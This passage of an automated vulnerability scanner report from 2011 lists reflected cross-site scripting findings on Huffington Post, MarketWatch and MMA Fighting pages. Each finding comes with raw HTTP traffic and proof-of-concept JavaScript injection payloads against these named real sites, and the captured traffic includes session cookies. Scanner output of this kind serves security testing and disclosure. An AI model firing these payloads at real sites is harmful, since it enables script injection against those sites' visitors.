GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous963b6<img%20src%3da%20onerror%3dalert(1)>f99a809b4c3&gn=window.Badges_217429195_1&eu=http%3A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html&id=857568&eco=1304530500&ebi2&entry_design=&cb=window.Badges_217429195_1.slicesCallback&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.11.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:00:41 GMT
Connection: close
Content-Length: 5924

window.Badges_217429195_1.slicesCallback({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous963b6<img src=a onerror=alert(1)>f99a809b4c3"],"global_name":"window.Badges_217429195_1","slice_params":{"facebook_glamorous":{"share_amount":"1550"},"retweet_glamorous":{"short_url":"http:\/\/huff.to\/mQyhPt","tweet_text":"Obama Decides Against
...[SNIP]...

5.198. http://www.huffingtonpost.com/permalink-tracker.html [vertical parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /permalink-tracker.html

Issue detail

The value of the vertical request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edefa"%3balert(1)//4a8362f1dd2 was submitted in the vertical parameter. This input was echoed as edefa";alert(1)//4a8362f1dd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /permalink-tracker.html?vertical=worldedefa"%3balert(1)//4a8362f1dd2 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=296
Date: Thu, 05 May 2011 01:00:36 GMT
Connection: close
Content-Length: 1352

<html>
<head>
<title>Huffit Tracker</title>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_config.js%2Chp_track.js"></script>
</head>
<body>
   <!-- Config -->    
   <script type="text/javascript">
       HPConfig.current_vertical_name = "worldedefa";alert(1)//4a8362f1dd2";
       HPConfig.current_web_address = "www.huffingtonpost.com";
       HPConfig.inst_type = "prod";
       HPConfig.timestamp_for_clearing_js = "1304533217";
   </script>
...[SNIP]...

5.199. http://www.huffingtonpost.com/users/logout/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /users/logout/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40592"-alert(1)-"6794a9a72f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /users/logout/?40592"-alert(1)-"6794a9a72f1=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 82841
Content-Type: text/html; charset=utf-8
Set-Cookie: huffpost_user_guid=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_prefs=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_smallphoto=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_bigphoto=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_pass=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user_id=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Expires: Thu, 05 May 2011 10:58:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
_fb_widgets = 1;
   HPConfig.current_vertical_name = 'homepage';
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/users/logout/?40592"-alert(1)-"6794a9a72f1=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

5.200. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /News/Story/Story.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d8f8'%3bc73e17508a0 was submitted in the REST URL parameter 1. This input was echoed as 1d8f8';c73e17508a0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /News1d8f8'%3bc73e17508a0/Story/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp05
Date: Thu, 05 May 2011 10:58:45 GMT
Content-Length: 50913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/News1d8f8';c73e17508a0/Story/Story.aspx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

5.201. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /News/Story/Story.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e95c5'%3b27c78d71732 was submitted in the REST URL parameter 2. This input was echoed as e95c5';27c78d71732 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /News/Storye95c5'%3b27c78d71732/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp04
Date: Thu, 05 May 2011 10:58:45 GMT
Content-Length: 50893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/News/Storye95c5';27c78d71732/Story.aspx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

5.202. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd126"-alert(1)-"900ecbe9de5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cd126"-alert(1)-"900ecbe9de5=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:45 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999932
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 64916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
="sportsillustrated.cnn.com,golf.com,fannation.com,sportsfanlive.com,sbnation.com";
s_265.mmxgo = true;
s_265.prop1="MMA";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://www.mmafighting.com/?cd126"-alert(1)-"900ecbe9de5=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.203. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a508"><script>alert(1)</script>5be8d4657ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6a508"><script>alert(1)</script>5be8d4657ca=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:45 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999950
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 64989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
<link rel="canonical" href="http://www.mmafighting.com/?6a508"><script>alert(1)</script>5be8d4657ca=1" />
...[SNIP]...

5.204. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 917bd"><script>alert(1)</script>fd80077afb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?917bd"><script>alert(1)</script>fd80077afb4=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:44 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:43 GMT; path=/
Keep-Alive: timeout=5, max=999994
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?917bd"><script>alert(1)</script>fd80077afb4=1" />
...[SNIP]...

5.205. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53f06"-alert(1)-"1a6d26d7f09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?53f06"-alert(1)-"1a6d26d7f09=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:45 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:44 GMT; path=/
Keep-Alive: timeout=5, max=999988
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
mmxgo = true;
s_265.prop1="MMA";
s_265.prop2="Article";
s_265.prop9="bsd:19930968";
s_265.prop12="http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?53f06"-alert(1)-"1a6d26d7f09=1";
s_265.prop17="sources-fedor-hendo-fight-could-be-announced-within-24-72-hours";
s_265.prop19="mike-chiappetta";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_cod
...[SNIP]...

5.206. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The value of the icid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2f3c"-alert(1)-"56010fc58d0 was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545a2f3c"-alert(1)-"56010fc58d0 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:28 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:28 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:27 GMT; path=/
Content-Type: text/html
Content-Length: 63555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
cle";
s_265.prop9="bsd:19931900";
s_265.prop12="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545a2f3c"-alert(1)-"56010fc58d0";
s_265.prop17="former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11";
s_265.prop19="ariel-helwani";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)do
...[SNIP]...

5.207. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The value of the icid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa5f5"><script>alert(1)</script>b5c0de1ee4a was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545fa5f5"><script>alert(1)</script>b5c0de1ee4a HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:28 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:28 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:27 GMT; path=/
Content-Type: text/html
Content-Length: 63630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545fa5f5"><script>alert(1)</script>b5c0de1ee4a" />
...[SNIP]...

5.208. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae19"><script>alert(1)</script>22fc5ab7398 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&fae19"><script>alert(1)</script>22fc5ab7398=1 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:29 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:29 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:28 GMT; path=/
Content-Type: text/html
Content-Length: 63649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
